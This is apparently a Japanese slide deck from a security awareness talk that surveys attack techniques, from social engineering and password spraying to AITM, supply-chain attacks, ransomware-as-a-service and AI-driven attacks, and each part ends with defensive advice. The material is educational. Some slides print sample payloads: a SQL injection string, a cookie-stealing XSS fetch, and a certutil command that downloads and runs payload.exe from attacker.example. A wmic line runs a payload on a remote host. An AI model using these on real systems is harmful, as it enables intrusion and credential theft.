明日話せるセキュリティネタ会#3

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 今日のテーマ 攻撃の全体像を俯瞰して、守りの勘所を掴む 古典 進化 トレンド 今も現役で動いている 基礎技法 SQLi・スプレー攻撃 ソーシャルエンジニアリング 古典の延長線上で 巧妙化した手法 AITM・MFA疲労 AI生成フィッシング ここ数年で主流化した 新しい脅威 RaaS・LOTL サプライチェーン CLASSIC EVOLVED TREND 守りを考える前に、何が飛んできているかを知る回です。 2

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 攻撃手法の全体像 カテゴリ 人を騙す 認証を破る システムを壊す 信頼を悪用 AIを使う 代表的な手法 ソーシャルエンジニアリング / フィッシング / ビッシング パスワード攻撃 / AITM / MFA疲労 マルウェア / ランサムウェア / ワイパー サプライチェーン攻撃 / LOTL ディープフェイク / Prompt Injection 攻撃は進化する ツールはコモディティ化し、 技能のハードルが下がり続けている 主な狙い 認証情報・内部情報 アカウント奪取 破壊・身代金 本丸への侵入経路 なりすまし・情報窃取 古典は残る 新手法は古典を置き換えない。 上乗せされていく 3

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 古典的攻撃 PART 1 STILL WORKING TODAY 4

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 【古典①】ソーシャルエンジニアリング 技術ではなく "人" を攻撃する プリテキスティング 役職者や取引先を装って 情報を引き出す 例: "総務部の〇〇ですが 新入社員のID確認で…" ベイティング 興味を引く物を"餌"にする 例: USBメモリを駐車場に落と す / 社外秘と書いたファイル テールゲーティング 物理的な侵入 例: 正規社員の後ろに くっついて入館 1990年代に Kevin Mitnick が体系化。 30年経っても一番成功率が高い攻撃であり続けている。 技術対策では防げない → 人の訓練が必要。 5

【古典②】パスワード攻撃 明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 手法 辞書攻撃 ブルートフォース パスワードスプレー クレデンシャルスタッフィング リバースブルートフォース 2026-04-19 | Quatrex × かーでぃ 概要 よく使われる単語リストで総当たり 全文字列を機械的に試す 1パスワード × 多数アカウント 漏洩済みID/PWの使い回し狙い 既知IDに対して総当たり 近年の潮流 パスワードスプレーは アカウントロックを回避できるため、 2024-2025年の企業侵害で 多数観測 対策 複雑なパスワード アカウントロック ロック回避型・今も有効 使い回し禁止・MFA レート制限・MFA 守り方 MFA必須化(特権アカウント) パスキー移行 不審ログイン検知 ID/PW使い回し禁止教育 6

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る

【古典③】Webアプリ攻撃

2026-04-19 | Quatrex × かーでぃ

1990年代から続く定番、今なお OWASP Top 10 の常連
SQLi
DBクエリに細工した値を
注入して実行させる
' OR '1'='1' --

2025年も新規CVE量産中

XSS
スクリプトを埋め込んで
閲覧者のセッション奪取
<script>
fetch('evil', {...cookie})
</script>

反射型・格納型・DOM型

CSRF
ログイン済みユーザーに
勝手に操作させる
標的が攻撃者のリンクを
踏むだけで送金等が実行
SameSite Cookie 等で緩和

古典中の古典だが、"昔の話" ではなく "今もある話"。
2025年もフレームワークの誤設定・独自実装でやられ続けている。
7

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 【古典④】マルウェアの系譜 感染の目的で分類が進化してきた 1980s〜 ウイルス ファイル感染 破 壊・愉快犯 動機の変化 愉快犯 → ビジネス 攻撃は産業化し、 儲かる方向に収束した 2000s〜 ワーム 自己増殖 ネット蔓 延 2000s〜 トロイ 偽装・潜伏 バック ドア 2005〜 スパイ/バンカー 情報窃取 金銭目的 へ 2010s〜 ランサム 暗号化+脅迫 ビジネ ス化 二重恐喝・三重恐喝 暗号化 + 情報公開 + DDoS + 取引先への通報 払うまで止めない構造 8

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 進化する攻撃 PART 2 FROM CLASSIC TO MODERN 9

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 【進化】フィッシング ― メールから AI 生成へ 〜2015 メール 日本語の違和感で 見抜け た時代 2015〜 スミッシング SMS / 宅配不在 銀行名義 2025年の現実 証券口座乗っ取り事件の 起点は AI 生成フィッシング 不正売買額 7,393億円 見た目での判定は限界。 フィッシング耐性のある認証 (パスキー) と、 "リンクを踏まない運用" にシフトが必要。 2020〜 ビッシング 音声 / ヘルプデスク なり すまし 2023〜 AI生成 自然な日本語 パーソナラ イズ 通用しなくなったもの "日本語が変だから怪しい" "ドメインを確認しよう" (正規ドメインを中継される) "ベンダーロゴで判断" 10

【進化】中間者攻撃 ― MITM から AITM へ 明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ MITM CLASSIC Man-in-the-Middle AITM MODERN Adversary-in-the-Middle 典型: 公衆WiFiでの傍受 典型: EvilGinx, Modlishka 通信経路に割り込み 盗聴・改ざん TLS普及で一時的に下火に ユーザー 攻撃者サーバが正規サイトへリアルタイム中継 ID/PW・MFA コード・セッションクッキーを奪取 MFAを突破できる ▶ 攻撃者サーバ リバースプロキシが入力を素通し ▶ 正規サイト ⤴ 途中で セッションCookie を掠め取る 2025年の証券口座事件で実際に使われた手法。 対策は FIDO / パスキー ― フィッシング耐性のある認証方式。 11

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 【進化】認証突破 ― MFA も万能じゃない MFA疲労攻撃 SIMスワップ 復旧フロー悪用 深夜に大量プッシュ通知を送 り、 根負けして承認させる Uber侵害 (2022) の手口 通信キャリアを騙して SIM を乗っ取り、 SMS OTP を奪う パスワード再設定・ バックアップコード・ ヘルプデスクなど 横道から侵入 FATIGUE TELCO 67% ×150 フィッシング型MFAが突破された攻撃 AITM攻撃の増加 割合 (Microsoft, 2024) (2022→2024) "MFA 入れたから安心" は卒業すべき。次は パスキー。 RECOVERY 100% パスキーのフィッシング耐性 (FIDO設計上) 12

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 最新トレンド PART 3 THE CURRENT FRONTLINE 13

【トレンド】サプライチェーン攻撃 明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 標的を直接攻めず、取引先や依存ライブラリから入る 事例 SolarWinds MOVEit XZ Utils backdoor アスクル 守る側の教訓 年 2020 2023 2024 2025 侵入経路 監視ソフト更新に毒混入 ファイル転送SaaSの脆弱性 OSSメンテナ乗っ取り MFA未設定の業務委託先 委託先・SaaS の認証統制 SBOM による依存把握 権限は最小化+期限付き 影響 米政府機関含む1.8万社 2,700社超 Linux全体に波及寸前 法人売上95%減 経産省の動き SCS 評価制度 (★3〜★5 の 3 段階) 2026年度末から開始予定 自社だけでは守り切れない時代 14

【トレンド】Living off the Land (LOTL) 明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 攻撃者は "専用マルウェア" を持ち込まない 正規ツールを悪用 powershell.exe , WMI certutil , bitsadmin psexec , schtasks mshta , rundll32 wmic なぜ厄介か シグネチャ型 AV に検知されにくい ログ上は正常な管理操作と区別困難 検知には文脈・振る舞いの理解が必要 → ファイルレスで動く # 正規コマンドで任意ファイルをダウンロード&実行 certutil -urlcache -f http://attacker.example/payload.exe payload.exe # WMI 経由でリモート実行(横展開) wmic /node:target.local process call create "cmd.exe /c payload.exe" 対策は EDR + 振る舞い検知。シグネチャ型AVでは無理。 15

【トレンド】RaaS ― ランサムウェアの産業化 明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 開発者 IAB アフィリエイト マルウェア本体を 開発・保守 アフィリエイトへ提供 Initial Access Broker 侵入済み環境を ダークウェブで販売 実際に展開し 身代金を分配 70-80% を取る DEVELOPER グループ Qilin (キリン) LockBit ALPHV / BlackCat Akira 特徴 BROKER ロシア系、医療/製造業標的 2024 国際捜査摘発 → 再興 医療・金融 中堅企業狙い AFFILIATE 代表事例 アサヒGHD (2025) 名古屋港 (2023) Change Healthcare (2024) 国内事例多数 攻撃が分業化・効率化された結果、件数も質も上がり続けている。 16

【最新】AI 駆動型攻撃 明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 2024-2025年から実運用段階に入った新しい脅威 ディープフェイク Prompt Injection 自律型攻撃 香港で CFO になりすました 動画会議で 38 億円詐取 (2024年2月) Arup社の事例 社内 RAG・AI アシスタント に仕込んだ文書から 機密データを吐かせる OWASP LLM Top 10 の #1 LLM が偵察〜侵入〜横展開を 自動実行する実験段階 PentestGPT 等で実証 ×4 生成AI活用フィッシング 38億円 Arup社の TOP 1 OWASP LLM Top 10 の DEEPFAKE メールの増加 (2023→2024) LLM ディープフェイク被害額 攻撃側のコストが下がる = 攻撃の数と精度が両方上がる。 AGENT Prompt Injection 17

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ 【最前線】AI が見つけた 27年モノのバグ Claude Mythos Preview (Anthropic) が OpenBSD TCP SACK に潜む脆弱性を自律発見 バグの正体 影響 意味するもの 符号付き整数オーバーフロー × 2 の論理連鎖 不正パケット1つで カーネルクラッシュ 27年間未検出で OpenBSD に潜伏 従来のファジングでは 到達しにくい論理バグを AI が設計意図を読んで 組み合わせて発見 防御にも使える "両刃の剣" SIGNED OVERFLOW レンジ始点の未チェック シーケンス番号比較で (int)(a - b) < 0 が 約21億離れると反転 DoS 守る側も AI を使う時代。攻守ともに AI 駆動が標準化しつつある。 参考: AIが27年モノのOpenBSDバグを発見 — 窓の杜 AI 18

• https://forest.watch.impress.co.jp/docs/serial/aistream/2102602.html

明日話せるセキュリティネタ会 #3 ― 攻撃手法を知る 2026-04-19 | Quatrex × かーでぃ まとめ ― 明日話せる3つのポイント 01 古典は死んでいない SQLi も パスワードスプレー も ソーシャルエンジニアリングも 今日の主役 新手法は古典を置き換えず、 上に積み上がっていく #明日話せるセキュリティネタ会 02 "MFA 入れたから安心" は終わった AITM と MFA疲労で突破される 次は FIDO / パスキー (フィッシング耐性認証) 03 自社だけ守っても 守り切れない サプライチェーン・委託先・ OSS 依存がすべて攻撃面 最小権限 + 監視 + 評価制度 ― Quatrex × かーでぃ 19